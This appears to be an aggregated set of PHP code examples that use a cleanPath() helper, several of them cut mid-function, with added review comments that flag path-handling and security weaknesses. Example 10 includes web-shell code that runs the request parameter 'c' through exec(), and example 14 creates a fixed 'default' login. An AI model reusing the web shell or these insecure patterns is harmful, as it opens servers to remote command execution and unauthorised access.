Exemplo n.º 1
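/**
 * Build a flat lock-file name from a path.
 *
 * The path is passed through cleanPath(), every '/' and '\' becomes '$',
 * every ':' becomes '#', and a trailing '$' is appended. A doubled leading
 * '$' is reduced to a single one.
 *
 * NOTE(review): the mapping is not injective ('/', '\' and a literal '$' all
 * end up as '$'; ':' and '#' both end up as '#'), so two different paths can
 * produce the same lock name. Confirm that callers tolerate shared locks.
 *
 * @param string $path Path the lock refers to
 * @return string Lock-file name without directory separators
 */
function lockname($path)
{
    // Replace all '/' with $ for a filename for the lock file
    $name = str_replace('/', '$', cleanPath($path)) . '$';
    $name = str_replace(':', '#', $name);
    // Remove double dollar char when it exists. strncmp() is used instead of
    // indexing $name[1], which is out of range when the cleaned path is empty
    // and the name is just the single trailing '$'.
    if (strncmp($name, '$$', 2) === 0) {
        $name = substr($name, 1);
    }
    // Backslashes (Windows separators) are flattened the same way as '/'.
    return str_replace('\\', '$', $name);
}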
Exemplo n.º 2
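 /**
  * Collect the Manifest/Provider files found on the include_path.
  *
  * Each include_path entry that exists and does not start with '.' is walked
  * recursively. Files are kept when they match the accept pattern, are not
  * blacklisted, are not symbolic links, and have a path relative to their
  * include_path entry that has not been seen under an earlier entry.
  * Only the first include_path entry that contains Zend Framework has its
  * 'Zend' directory traversed.
  *
  * @return array Array of files to load
  */
 protected function _getFiles()
 {
     require_once PHP_LIBRARY_PATH . 'Zend/Loader.php';
     $paths = Zend_Loader::explodeIncludePath();
     // relative paths already collected, kept as a set (path => true) so the
     // duplicate check does not rescan a growing list for every file
     $seenRelative = array();
     $files = array();
     $isZendTraversed = false;
     foreach ($paths as $path) {
         // default patterns to use
         $filterDenyDirectoryPattern = '.*(/|\\\\).svn';
         $filterAcceptFilePattern = '.*(?:Manifest|Provider)\\.php$';
         if (!file_exists($path) || $path[0] == '.') {
             continue;
         }
         $realIncludePath = cleanPath($path);
         // ensure that we only traverse a single version of Zend Framework on all include paths
         if (file_exists($realIncludePath . '/Zend/Tool/Framework/Loader/IncludePathLoader.php')) {
             if ($isZendTraversed === false) {
                 $isZendTraversed = true;
             } else {
                 // use the deny directory pattern that includes the path to 'Zend', it will not be accepted
                 // NOTE(review): preg_quote() is called without a delimiter here; which delimiter
                 // the filter iterator wraps the pattern in is not visible in this method.
                 $filterDenyDirectoryPattern = '.*((/|\\\\).svn|' . preg_quote($realIncludePath . DIRECTORY_SEPARATOR) . 'Zend)';
             }
         }
         // create recursive directory iterator
         $rdi = new RecursiveDirectoryIterator($path);
         // pass in the RecursiveDirectoryIterator & the patterns
         $filter = new Zend_Tool_Framework_Loader_IncludePathLoader_RecursiveFilterIterator($rdi, $filterDenyDirectoryPattern, $filterAcceptFilePattern);
         // build the rii with the filter
         $iterator = new RecursiveIteratorIterator($filter);
         $prefixPattern = '#^' . preg_quote($realIncludePath . DIRECTORY_SEPARATOR, '#') . '#';
         // iterate over the accepted items
         foreach ($iterator as $item) {
             $file = (string) $item;
             if ($this->_fileIsBlacklisted($file)) {
                 continue;
             }
             // no links allowed here for now; checked before any path work so a
             // link is never resolved and collected as a file to load
             if ($item->isLink()) {
                 continue;
             }
             $resolved = $item->getcleanPath();
             // ensure that the same named file from separate include_paths is not loaded
             $relativeItem = (string) preg_replace($prefixPattern, '', $resolved);
             // no items that are relatively the same are allowed
             if (isset($seenRelative[$relativeItem])) {
                 continue;
             }
             $seenRelative[$relativeItem] = true;
             $files[] = $resolved;
         }
     }
     return $files;
 }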
Exemplo n.º 3
 /**
  * create()
  *
  * Create a new project skeleton in $path, or in the current working
  * directory when no path is given, from a project profile.
  *
  * The profile data comes from the first source that yields content: the
  * file named by $fileOfProfile, then the stored profile
  * 'project/profiles/<name>.xml' when storage is enabled, then the default
  * profile.
  *
  * @param string $path
  * @param string $nameOfProfile shortName=n
  * @param string $fileOfProfile shortName=f
  * @throws Zend_Tool_Framework_Client_Exception when the directory cannot be
  *         created or a project profile is already found at $path
  */
 public function create($path, $nameOfProfile = null, $fileOfProfile = null)
 {
     // Loose comparison: an empty string also selects the working directory.
     if ($path == null) {
         $path = getcwd();
     } else {
         $path = trim($path);
         if (!file_exists($path)) {
             // mkdir() is called without a mode or the recursive flag, so the
             // PHP defaults apply and a missing parent directory makes it fail.
             $created = mkdir($path);
             if (!$created) {
                 require_once PHP_LIBRARY_PATH . 'Zend/Tool/Framework/Client/Exception.php';
                 throw new Zend_Tool_Framework_Client_Exception('Could not create requested project directory \'' . $path . '\'');
             }
         }
         // normalise to forward slashes after cleaning
         $path = str_replace('\\', '/', cleanPath($path));
     }
     // refuse to overwrite an existing project
     $profile = $this->_loadProfile(self::NO_PROFILE_RETURN_FALSE, $path);
     if ($profile !== false) {
         require_once PHP_LIBRARY_PATH . 'Zend/Tool/Framework/Client/Exception.php';
         throw new Zend_Tool_Framework_Client_Exception('A project already exists here');
     }
     $profileData = null;
     // 1st source: an explicit profile file, read as-is
     if ($fileOfProfile != null && file_exists($fileOfProfile)) {
         $profileData = file_get_contents($fileOfProfile);
     }
     $storage = $this->_registry->getStorage();
     // 2nd source: a named profile from storage.
     // NOTE(review): $nameOfProfile is concatenated into the storage key without
     // validation; confirm that the storage adapter rejects '..' and path
     // separators if this value can come from anything but a trusted operator.
     if ($profileData == '' && $nameOfProfile != null && $storage->isEnabled()) {
         $profileData = $storage->get('project/profiles/' . $nameOfProfile . '.xml');
     }
     // 3rd source: the built-in default profile
     if ($profileData == '') {
         $profileData = $this->_getDefaultProfile();
     }
     $newProfile = new Zend_Tool_Project_Profile(array('projectDirectory' => $path, 'profileData' => $profileData));
     $newProfile->loadFromData();
     $response = $this->_registry->getResponse();
     $response->appendContent('Creating project at ' . $path);
     $response->appendContent('Note: ', array('separator' => false, 'color' => 'yellow'));
     $response->appendContent('This command created a web project, ' . 'for more information setting up your VHOST, please see docs/README');
     if (!Zend_Tool_Project_Provider_Test::isPHPUnitAvailable()) {
         $response->appendContent('Testing Note: ', array('separator' => false, 'color' => 'yellow'));
         $response->appendContent('PHPUnit was not found in your include_path, therefore no testing actions will be created.');
     }
     // create every resource described by the profile
     foreach ($newProfile->getIterator() as $resource) {
         $resource->create();
     }
 }
Exemplo n.º 4
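/**
 * Recursively search one or more library directories for a file.
 *
 * Every probe is appended to the global $autoloadlog string.
 *
 * NOTE(review): is_dir() follows symbolic links, so a link that points back
 * to an ancestor directory would make the recursion loop. Confirm that the
 * library roots are trusted and contain no such links.
 *
 * @param string|array $lib  Directory, or list of directories, to search
 * @param string       $file File name being looked for
 * @param string       $ds   Separator used when descending into subdirectories
 * @return string|false Path of the first hit, FALSE when nothing was found
 */
function search_lib($lib, $file, $ds = '/')
{
    global $autoloadlog;
    // A list of directories: return the first hit among them.
    if (is_array($lib)) {
        foreach ($lib as $dir) {
            if ($f = search_lib($dir, $file, $ds)) {
                return $f;
            }
        }
        return FALSE;
    }
    // The given directory is not valid: log it and give up.
    if (!is_dir($lib)) {
        $autoloadlog .= 'Lib "' . $lib . '" is not a dir.' . PHP_EOL . PHP_EOL;
        return FALSE;
    }
    // NOTE(review): cleanPath() is defined elsewhere; as called here it receives
    // the directory, an empty string and the separator, and $file is not passed.
    // Confirm that this is the intended way to build the candidate path.
    $path = cleanPath($lib, '', $ds);
    $autoloadlog .= 'Lib: ' . $lib . PHP_EOL . 'File: ' . $file . PHP_EOL . PHP_EOL . 'Path: ' . $path . PHP_EOL . PHP_EOL . (file_exists($path) ? 'EXISTS!' : 'NOT Exists!') . PHP_EOL . PHP_EOL . str_repeat('-', 200) . PHP_EOL . PHP_EOL;
    // The file already exists in this first directory.
    if (file_exists($path)) {
        return $path;
    }
    // List subdirectories and files; an unreadable directory yields FALSE
    // from scandir() and is treated as "nothing found here".
    $entries = scandir($lib, 1);
    if ($entries === false) {
        return FALSE;
    }
    foreach (array_diff($entries, ['.', '..']) as $dir) {
        // Plain files are skipped, only directories are searched.
        if (!is_dir($lib . $ds . $dir)) {
            continue;
        }
        $f = search_lib($lib . $ds . $dir, $file, $ds);
        if ($f !== FALSE) {
            return $f;
        }
    }
    // Nothing found below this directory.
    return FALSE;
}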
Exemplo n.º 5
/**
 * Compute the relative path that leads from $p1 to $p2.
 *
 * File arguments are reduced to their directory first. The result uses '/'
 * separators, has no trailing slash, and is "." when both locations are the
 * same.
 *
 * NOTE(review): realpath() returns FALSE for a path that does not exist;
 * that case is not handled separately here.
 *
 * @param string $p1 Starting file or directory
 * @param string $p2 Target file or directory
 * @return string Relative path from $p1 to $p2
 */
function pfc_RelativePath($p1, $p2)
{
    if (is_file($p1)) {
        $p1 = dirname($p1);
    }
    if (is_file($p2)) {
        $p2 = dirname($p2);
    }
    // using realpath function is necessary to resolve symbolic links
    $p1 = realpath(cleanPath($p1));
    $p2 = realpath(cleanPath($p2));
    $res = "";
    // echo $p1."<br>";
    // echo $p2."<br>";
    // Climb from $p1 towards the root, adding one "../" per level, until $p1 is
    // a string prefix of $p2 or a root is reached.
    // NOTE(review): the prefix test has no separator boundary, so "/a/b" counts
    // as a prefix of "/a/bc".
    // NOTE(review): as written the drive pattern matches a letter, ':' and a
    // literal '$'; a Windows drive root such as "C:\" would not match. Confirm
    // the intended pattern, since this test is one of the loop's stop conditions.
    while ($p1 != "" && $p1 != "/" && !preg_match("/^[a-z]\\:\\\$/i", $p1) && strpos($p2, $p1) !== 0) {
        $res .= "../";
        $p1 = dirname($p1);
    }
    // Strip the common prefix (and the separator that follows it) from $p2.
    if (isset($_SERVER["WINDIR"]) || isset($_SERVER["windir"])) {
        $p2 = str_replace("\\", "/", substr($p2, strlen($p1) + 1, strlen($p2) - strlen($p1)));
    } else {
        if ($p1 === "/" || $p1 === "") {
            $p2 = substr($p2, strlen($p1));
        } else {
            $p2 = substr($p2, strlen($p1) + 1);
        }
    }
    $res .= $p2;
    // remove the last "/"
    if (preg_match("/.*\\/\$/", $res)) {
        $res = preg_replace("/(.*)\\//", "\$1", $res);
    }
    // if rootpath is empty replace it by "." to avoid a url starting with "/"
    if ($res == "") {
        $res = ".";
    }
    //  echo $res."<br>";
    return $res;
}
Exemplo n.º 6
/**
 * Remove every hot-folder artefact that belongs to one input file.
 *
 * The document itself is deleted from the input, non-PDF, original and
 * processed folders; its report is deleted from the report folders. Missing
 * files are ignored (errors from unlink() are suppressed).
 *
 * NOTE(review): $file is interpolated into the paths without validation here.
 * Callers should pass a bare file name; confirm that cleanPath() or the caller
 * rejects '..' and directory separators.
 *
 * @param string $file Name of the input file
 * @return void
 */
function cleanup($file)
{
    global $hotdir, $INP, $NPDF, $ORIG_ERR, $ORIG_OK, $PROC_ERR, $PROC_OK, $NPDF_ERR, $REP_ERR, $REP_OK;
    // PitStop names reports like this
    $reportName = "{$file}_log.pdf";
    // folders that hold a copy of the document itself
    $documentDirs = array($INP, $NPDF, $ORIG_ERR, $ORIG_OK, $PROC_ERR, $PROC_OK);
    // folders that hold the report written for the document
    $reportDirs = array($NPDF_ERR, $REP_ERR, $REP_OK);
    foreach ($documentDirs as $dir) {
        @unlink(cleanPath("{$hotdir}/{$dir}/{$file}"));
    }
    foreach ($reportDirs as $dir) {
        @unlink(cleanPath("{$hotdir}/{$dir}/{$reportName}"));
    }
}
Exemplo n.º 7
 /**
  * Compare a path against the configured public_dir.
  *
  * Both values are passed through cleanPath() and the first strlen(public_dir)
  * bytes are compared. The method returns TRUE when those bytes differ, i.e.
  * when $path does NOT begin with public_dir, and FALSE when it does.
  *
  * NOTE(review): confirm that callers expect this polarity before relying on
  * the result as a containment check.
  * NOTE(review): this is a plain byte-prefix comparison without a separator
  * boundary, so a sibling such as "<public_dir>-old" shares the prefix.
  *
  * @param  string $path
  * @return bool
  */
 protected function _verifyPath($path)
 {
     $candidate = cleanPath($path);
     $publicDir = cleanPath($this->_options['public_dir']);
     $sharesPrefix = strncmp($candidate, $publicDir, strlen($publicDir)) === 0;
     return !$sharesPrefix;
 }
Exemplo n.º 8
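/**
 * Bootstrap one installer request.
 *
 * Starts the session, serves streamed content addressed through PATH_INFO,
 * applies the restart/next/prev navigation parameters and reports the
 * resulting installer state.
 *
 * NOTE(review): the PATH_INFO segments are client-controlled and are handed to
 * streamContent(); any validation has to happen in cleanPath() or
 * streamContent(), neither of which is visible here.
 * NOTE(review): execution continues after redirectSelf() unless that function
 * terminates the request; confirm that it does.
 *
 * @return array 'with_db' (bool) and 'step' (current installer step)
 */
function installerInit()
{
    sessionInit();
    // handle streamed content first
    if (isset($_SERVER['PATH_INFO'])) {
        $segments = cleanPath(explode('/', $_SERVER['PATH_INFO']));
        if (count($segments) === 3) {
            if ($segments[0] == "stream") {
                streamContent($segments[2], $segments[1]);
            }
        } else {
            redirectSelf();
        }
    }
    // an installation that already holds the lock is pinned to the final step
    if (installerStep() !== STEP_DONE && getLock()) {
        installerStepSet(STEP_DONE);
        redirectSelf();
    }
    if (isset($_GET['restart'])) {
        session_destroy();
        redirectSelf();
    }
    if (isset($_GET['next'])) {
        transitionNextStep();
    }
    if (isset($_GET['prev'])) {
        installerStepSet(prevStep(installerStep()));
    }
    $result = array();
    $result['with_db'] = dbEnabled() ? TRUE : FALSE;
    $result['step'] = installerStep();
    return $result;
}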
Exemplo n.º 9
 } elseif ($szHayPol && $szHayLin && !$szHayPto) {
     $aSzFiles = array($szFileNamePol . ".shp", $szFileNamePol . ".shx", $szFileNamePol . ".dbf", $szFileNameLin . ".shp", $szFileNameLin . ".shx", $szFileNameLin . ".dbf");
 } elseif ($szHayPol && !$szHayLin && $szHayPto) {
     $aSzFiles = array($szFileNamePol . ".shp", $szFileNamePol . ".shx", $szFileNamePol . ".dbf", $szFileNamePto . ".shp", $szFileNamePto . ".shx", $szFileNamePto . ".dbf");
 } elseif (!$szHayPol && $szHayLin && $szHayPto) {
     $aSzFiles = array($szFileNameLin . ".shp", $szFileNameLin . ".shx", $szFileNameLin . ".dbf", $szFileNamePto . ".shp", $szFileNamePto . ".shx", $szFileNamePto . ".dbf");
 } elseif ($szHayPol && !$szHayLin && !$szHayPto) {
     $aSzFiles = array($szFileNamePol . ".shp", $szFileNamePol . ".shx", $szFileNamePol . ".dbf");
 } elseif (!$szHayPol && $szHayLin && !$szHayPto) {
     $aSzFiles = array($szFileNameLin . ".shp", $szFileNameLin . ".shx", $szFileNameLin . ".dbf");
 } elseif (!$szHayPol && !$szHayLin && $szHayPto) {
     $aSzFiles = array($szFileNamePto . ".shp", $szFileNamePto . ".shx", $szFileNamePto . ".dbf");
 }
 // create the temp download directory
 // Both base locations are read from the session and passed through cleanPath().
 $szDownloadPath = cleanPath($_SESSION["gszTmpImgPath"]);
 $szDownloadUrl = cleanPath($_SESSION["gszTmpWebPath"]);
 // NOTE(review): the directory name is an MD5 of uniqid()/rand() output, which
 // is derived from the clock and a non-cryptographic PRNG. If the directory is
 // reachable through $szDownloadUrl (the variable names suggest so; confirm),
 // this name is the only thing separating one user's download from another's;
 // a name taken from a CSPRNG would be the safer choice.
 $szUniqid = md5(uniqid(rand(), true));
 // check if directory exists
 if (!is_dir($szDownloadPath . $szUniqid . "/")) {
     // Mode 0777 requests a world-writable directory (subject to the umask).
     // Errors are suppressed with @; the code that follows re-tests is_dir().
     @mkdir($szDownloadPath . $szUniqid . "/", 0777);
 }
 // check for failure
 if (!is_dir($szDownloadPath . $szUniqid . "/")) {
     // set flag
     $bSkipExtract = true;
     // set error message
     $szErrorNotice .= $oMLT->get("17", "Error al crear directorio temporal de bajada.");
 } else {
     // set flag
     $bSkipExtract = false;
     // update paths
Exemplo n.º 10
            }
        }
        // Emit the directory listing: '.' and '..' first, then sub-directories,
        // then files with download / edit / delete links.
        // NOTE(review): $d and the directory and file names are written into href
        // attributes and link text without HTML or URL encoding. The file
        // operations are exposed as plain GET links (?dl, ?ef, ?df), and no
        // authentication or CSRF check is visible in this excerpt.
        echo "<a href='?d={$d}{$slash}.'><font color=grey>.\n</font></a>";
        echo "<a href='?d={$d}{$slash}..'><font color=grey>..\n</font></a>";
        //Some configurations throw a notice if is_array is tried with a non-existent variable
        if (isset($dirList)) {
            if (is_array($dirList)) {
                foreach ($dirList as $dir) {
                    echo "<a href='?d={$d}{$slash}{$dir}'><font color=grey>{$dir}\n</font></a>";
                }
            }
        }
        if (isset($fileList)) {
            if (is_array($fileList)) {
                // each entry is an array with 'dir' (the name) and 'color' keys
                foreach ($fileList as $dir) {
                    echo "<a href='?f={$d}" . $slash . $dir['dir'] . "'><font color=" . $dir['color'] . ">" . $dir['dir'] . "</font></a>" . "|<a href='?dl=" . cleanPath($d, $isLinux) . '&file=' . $dir["dir"] . "' target='_blank'>Download</a>|" . "|<a href='?ef=" . cleanPath($d, $isLinux) . '&file=' . $dir["dir"] . "' target='_blank'>Edit</a>|" . "|<a href='?df=" . cleanPath($d, $isLinux) . '&file=' . $dir["dir"] . "' target='_blank'>Delete</a>| \n";
                }
            }
        }
    } else {
        echo "opendir() failed";
    }
    closedir($handle);
} elseif (isset($_REQUEST['c'])) {
    // NOTE(review): the request parameter 'c' is passed to exec() unmodified and
    // echoed back without HTML escaping; no authentication check is visible in
    // this excerpt. Code of this shape is a web shell: finding it under a web
    // root should be handled as an indicator of compromise (isolate the host,
    // review access logs for requests carrying a 'c' parameter) rather than as
    // code to be hardened.
    if (@ini_get('safe_mode')) {
        echo 'Safe mode is on, the command is by default run though escapeshellcmd() and can only run programms in safe_mod_exec_dir (' . @ini_get('safe_mode_exec_dir') . ') <br />';
    }
    echo "<b>Command: <I>" . $_REQUEST['c'] . "</I></b><br /><br />";
    // exec() fills $return with the output lines; the trim() result is discarded.
    trim(exec($_REQUEST['c'], $return));
    foreach ($return as $val) {
        echo '<pre>' . htmlentities($val) . '</pre>';
Exemplo n.º 11
        case 'admin':
            return 127;
        case 'guest':
            return 1;
        case 'disabled':
            return 0;
        case 'none':
        case 'normal':
        default:
            return 2;
    }
}
//====================
// Log in
//====================
// Directory requested through the query string, passed through cleanPath().
$d = isset($_GET['d']) ? cleanPath($_GET['d']) : false;
// $d is replaced after login.
$status = '';
$time = time();
// NOTE(review): $_POST['logout'], ['login'] and ['server'] are read without
// isset(), which raises a notice on requests that do not carry them.
if ($_POST['logout']) {
    // Expire the session cookie and clear the stored session id for this user.
    // NOTE(review): the cookie is set without path, Secure or HttpOnly
    // arguments; confirm that this matches how 'fmsid' is issued.
    setcookie('fmsid', '', time() - 86400);
    $_PERSIST['users'][$uid]['sid'] = '';
    persist_update('_PERSIST', 'ftpusers.inc.php');
    $status = 'lo';
} else {
    if ($_POST['login'] && $_POST['server']) {
        $status = 'nli';
        // fall back to the standard FTP port when none (or a non-number) is given
        if (!intval($_POST['port'])) {
            $_POST['port'] = 21;
        }
        // NOTE(review): host and port come straight from the request, so this
        // server opens an outbound connection to whatever the client names.
        // Consider an allow-list of FTP hosts; connection errors are hidden by @.
        $ftp = @ftp_connect($_POST['server'], intval($_POST['port']));
Exemplo n.º 12
    // emit the HTML
    echo "<table align=\"center\" border=\"0\" cellspacing=\"" . VIEWER_SPACING . "\" cellpadding=\"" . VIEWER_PADDING . "\" width=\"100%\" height=\"100%\">\n";
    echo "  <tr>\n";
    echo "    <td class=\"none\" align=\"center\" valign=\"middle\" width=\"100%\" height=\"100%\">\n";
    echo "      " . TEXT_SELECT . "\n";
    echo "    </td>\n";
    echo "  </tr>\n";
    echo "</table>\n";
}
// process GET/POST parameters
// $HTTP_GET_VARS is the legacy long-array name for $_GET; it is no longer
// populated on PHP 5.4 and later, where $file would always stay empty.
$file = "";
if (isset($HTTP_GET_VARS["file"])) {
    // NOTE(review): query values are already URL-decoded by PHP, so this
    // urldecode() is a second decoding pass over client-supplied data.
    $file = urldecode($HTTP_GET_VARS["file"]);
}
// parse and clean the File
// NOTE(review): the return value is discarded, so this call only has an effect
// if cleanPath() takes its argument by reference (its signature is not visible
// here). $file is later written into an inline script string via imageURL().
cleanPath($file);
?>
<body leftmargin=0 topmargin=0 marginwidth=0 marginheight=0>
<?php 
// generate the Preview
imageTag($base);
?>
<script language="javascript">
var src = '<?php 
echo strlen($file) > 0 ? imageURL($file, TRUE) : "";
?>
';

if(src.length > 0) {
   var manager = findAncestor(window.frameElement, '<?php 
echo MANAGER_NAME;
Exemplo n.º 13
/**
 * Delete a directory together with its contents.
 *
 * The path is cleaned first; anything that is not a directory is left alone.
 * A failing rmdir() is silenced.
 *
 * NOTE(review): is_dir() is also true for a symbolic link to a directory.
 * Whether excluiConteudo() follows links is not visible here; confirm before
 * calling this on paths an untrusted user can influence.
 *
 * @param string $diretorio Directory to remove
 * @return void
 */
function excluiDiretorio($diretorio)
{
    $target = cleanPath($diretorio);
    if (!is_dir($target)) {
        return;
    }
    // empty the directory first, rmdir() only removes empty directories
    excluiConteudo($target);
    @rmdir($target);
}
Exemplo n.º 14
if (!file_exists($users) && !file_exists($projects) && !file_exists($active)) {
    //////////////////////////////////////////////////////////////////
    // Get POST responses
    //////////////////////////////////////////////////////////////////
    // Despite the heading, no POST data is read here: the user name and the
    // password are both the literal "default".
    // NOTE(review): this creates a fixed, well-known credential pair on first
    // run. The code that stores it is outside this excerpt; if it becomes a
    // working login, generate a random initial password or force a change at
    // first sign-in.
    $username = cleanUsername("default");
    $password = encryptPassword("default");
    //////////////////////////////////////////////////////////////////
    // Create Projects files
    //////////////////////////////////////////////////////////////////
    $project_path = 'cloud-project';
    $project_name = 'Cloud Project';
    if (!isAbsPath($project_path)) {
        // relative name: keep only word characters, '-' and '.', then create it
        // inside the workspace. The mkdir() result is not checked here.
        $project_path = str_replace(" ", "_", preg_replace('/[^\\w-\\.]/', '', $project_path));
        mkdir($workspace . "/" . $project_path);
    } else {
        // absolute path: clean it and drop one trailing slash
        $project_path = cleanPath($project_path);
        if (substr($project_path, -1) == '/') {
            $project_path = substr($project_path, 0, strlen($project_path) - 1);
        }
        if (!file_exists($project_path)) {
            if (!mkdir($project_path . '/', 0755, true)) {
                die("Unable to create Absolute Path");
            }
        } else {
            if (!is_writable($project_path) || !is_readable($project_path)) {
                die("No Read/Write Permission");
            }
        }
    }
    // register the project as the only entry of the projects file
    $project_data = array("name" => $project_name, "path" => $project_path);
    saveJSON($projects, array($project_data));
Exemplo n.º 15
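/**
 * Check whether a path is covered by a list of allowed locations.
 *
 * An entry that contains a directory separator is treated as a path and must
 * equal $path or its parent directory. An entry without a separator is
 * treated as a bare name and must equal the last segment of $path or of its
 * parent directory.
 *
 * Comparisons are strict string comparisons: with loose '==' two different
 * numeric-looking names (for example "10" and "1e1") compare equal, which
 * would grant access to a path that is not on the list.
 *
 * @param array  $_allowPath Allowed paths or bare names
 * @param string $_path      Path being requested
 * @return bool TRUE when the path is allowed
 */
function hadFileRight($_allowPath, $_path)
{
    $path = cleanPath($_path);
    $parent = dirname($path);
    foreach ($_allowPath as $right) {
        // entries are compared as strings, whatever type the list holds
        $right = (string) $right;
        $hasSeparator = strpos($right, '/') !== false || strpos($right, '\\') !== false;
        if ($hasSeparator) {
            // NOTE(review): this condition is always true, because an entry
            // cannot start with '/' and with '\' at the same time, so the root
            // path is prepended to every entry, absolute ones included. '&&'
            // may have been intended; left unchanged because switching it would
            // widen what this check allows.
            if (strpos($right, '/') !== 0 || strpos($right, '\\') !== 0) {
                $right = getRootPath() . '/' . $right;
            }
            if ($parent === $right || $path === $right) {
                return true;
            }
        } else {
            if (basename($parent) === $right || basename($path) === $right) {
                return true;
            }
        }
    }
    return false;
}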
Exemplo n.º 16
 /**
  * Add translations
  *
  * This may be a new language or additional content for an existing language
  * If the key 'clear' is true, then translations for the specified
  * language will be replaced and added otherwise
  *
  * When 'content' is a directory it is scanned recursively; the locale of each
  * file is taken from a directory name or from the file name, depending on the
  * 'scan' option, and sources that fail to load are skipped silently.
  *
  * NOTE(review): $options['ignore'] and $options['scan'] are read without
  * isset(); they are presumably supplied by $this->_options, which is merged
  * in before the scan. Confirm against the adapter defaults.
  *
  * @param  array|Zend_Config $options Options and translations to be added
  * @throws Zend_Translate_Exception
  * @return Zend_Translate_Adapter Provides fluent interface
  */
 public function addTranslation($options = array())
 {
     // Normalise the three accepted call styles into one options array.
     if ($options instanceof Zend_Config) {
         $options = $options->toArray();
     } else {
         if (func_num_args() > 1) {
             // positional style: (content, locale, options)
             $args = func_get_args();
             $options = array();
             $options['content'] = array_shift($args);
             if (!empty($args)) {
                 $options['locale'] = array_shift($args);
             }
             if (!empty($args)) {
                 $opt = array_shift($args);
                 // the positional content/locale win over keys of the same name in $opt
                 $options = array_merge($opt, $options);
             }
         } else {
             if (!is_array($options)) {
                 $options = array('content' => $options);
             }
         }
     }
     if (!isset($options['content']) || empty($options['content'])) {
         require_once PHP_LIBRARY_PATH . 'Zend/Translate/Exception.php';
         throw new Zend_Translate_Exception("Required option 'content' is missing");
     }
     // remember the locale the caller asked for; it is activated at the end
     $originate = null;
     if (!empty($options['locale'])) {
         $originate = (string) $options['locale'];
     }
     if (array_key_exists('log', $options) && !$options['log'] instanceof Zend_Log) {
         require_once PHP_LIBRARY_PATH . 'Zend/Translate/Exception.php';
         throw new Zend_Translate_Exception('Instance of Zend_Log expected for option log');
     }
     try {
         // resolve the locale unless the content is itself a translate object
         if (!$options['content'] instanceof Zend_Translate && !$options['content'] instanceof Zend_Translate_Adapter) {
             if (empty($options['locale'])) {
                 $options['locale'] = null;
             }
             $options['locale'] = Zend_Locale::findLocale($options['locale']);
         }
     } catch (Zend_Locale_Exception $e) {
         require_once PHP_LIBRARY_PATH . 'Zend/Translate/Exception.php';
         throw new Zend_Translate_Exception("The given Language '{$options['locale']}' does not exist", 0, $e);
     }
     // fill in every option the caller did not set from the adapter options
     $options = $options + $this->_options;
     if (is_string($options['content']) and is_dir($options['content'])) {
         $options['content'] = cleanPath($options['content']);
         $prev = '';
         // walk the tree, leaving out every path that contains .svn or .cvs
         $iterator = new RecursiveIteratorIterator(new RecursiveRegexIterator(new RecursiveDirectoryIterator($options['content'], RecursiveDirectoryIterator::KEY_AS_PATHNAME), '/^(?!.*(\\.svn|\\.cvs)).*$/', RecursiveRegexIterator::MATCH), RecursiveIteratorIterator::SELF_FIRST);
         foreach ($iterator as $directory => $info) {
             $file = $info->getFilename();
             if (is_array($options['ignore'])) {
                 foreach ($options['ignore'] as $key => $ignore) {
                     if (strpos($key, 'regex') !== false) {
                         // NOTE(review): the pattern comes from the options and is
                         // handed to preg_match() as-is; it has to be a complete,
                         // trusted regular expression.
                         if (preg_match($ignore, $directory)) {
                             // ignore files matching the given regex from option 'ignore' and all files below
                             continue 2;
                         }
                     } else {
                         if (strpos($directory, DIRECTORY_SEPARATOR . $ignore) !== false) {
                             // ignore files matching first characters from option 'ignore' and all files below
                             continue 2;
                         }
                     }
                 }
             } else {
                 if (strpos($directory, DIRECTORY_SEPARATOR . $options['ignore']) !== false) {
                     // ignore files matching first characters from option 'ignore' and all files below
                     continue;
                 }
             }
             if ($info->isDir()) {
                 // pathname as locale
                 if ($options['scan'] === self::LOCALE_DIRECTORY and Zend_Locale::isLocale($file, true, false)) {
                     $options['locale'] = $file;
                     $prev = (string) $options['locale'];
                 }
             } else {
                 if ($info->isFile()) {
                     // filename as locale
                     if ($options['scan'] === self::LOCALE_FILENAME) {
                         // first try the file name without its last extension
                         $filename = explode('.', $file);
                         array_pop($filename);
                         $filename = implode('.', $filename);
                         if (Zend_Locale::isLocale((string) $filename, true, false)) {
                             $options['locale'] = (string) $filename;
                         } else {
                             // otherwise split the name on '.', '_' and '-' and keep
                             // the longest token that is a valid locale
                             $parts = explode('.', $file);
                             $parts2 = array();
                             foreach ($parts as $token) {
                                 $parts2 += explode('_', $token);
                             }
                             $parts = array_merge($parts, $parts2);
                             $parts2 = array();
                             foreach ($parts as $token) {
                                 $parts2 += explode('-', $token);
                             }
                             $parts = array_merge($parts, $parts2);
                             $parts = array_unique($parts);
                             $prev = '';
                             foreach ($parts as $token) {
                                 if (Zend_Locale::isLocale($token, true, false)) {
                                     if (strlen($prev) <= strlen($token)) {
                                         $options['locale'] = $token;
                                         $prev = $token;
                                     }
                                 }
                             }
                         }
                     }
                     try {
                         $options['content'] = $info->getPathname();
                         $this->_addTranslationData($options);
                     } catch (Zend_Translate_Exception $e) {
                         // ignore failed sources while scanning
                     }
                 }
             }
         }
         unset($iterator);
     } else {
         $this->_addTranslationData($options);
     }
     // activate the originally requested locale when it now has translations
     if (isset($this->_translate[$originate]) === true and count($this->_translate[$originate]) > 0) {
         $this->setLocale($originate);
     }
     return $this;
 }
Exemplo n.º 17
}
// Check GET data
// NOTE(review): $_GET values are already URL-decoded by PHP; urldecode() is a
// second decoding pass, so a doubly-encoded sequence arrives here fully
// decoded. Any path filtering therefore has to run on these final values.
$file = urldecode($_GET['f']);
$pw = urldecode($_GET['p']);
$lang = $_GET['l'] == 'de' ? 'de' : 'en';
// Check referer
// NOTE(review): the Referer header is supplied by the client and may be
// absent. This prefix test discourages hot-linking but is not an access
// control.
if ($config['root_url'] != substr($_SERVER['HTTP_REFERER'], 0, strlen($config['root_url']))) {
    header('HTTP/1.1 403 Forbidden');
    echo $lang == 'de' ? 'Zugriff verweigert' : 'Access denied';
    exit;
}
// Check ending
// The first assignment is overwritten immediately; $ending ends up as the
// lower-cased text after the last dot, or FALSE when $file contains no dot.
$ending = true;
$ending = preg_match('/^(.*)\\.(.*?)$/', $file, $tmp) ? strtolower($tmp[2]) : false;
// Check and build path
$path = $config['uploads_path'] . DIRECTORY_SEPARATOR . cleanPath($file);
if (!is_file($path) || !$ending) {
    header('HTTP/1.0 404 Not Found');
    // the Referer value is reflected into the Refresh header unchanged
    header('Refresh:3;url=' . $_SERVER['HTTP_REFERER']);
    echo $lang == 'de' ? 'Datei nicht gefunden' : 'File not found';
    exit;
}
// Get filename
$temp = explode('/', $file);
$filename = str_replace('"', '', array_pop($temp));
// Get blank path
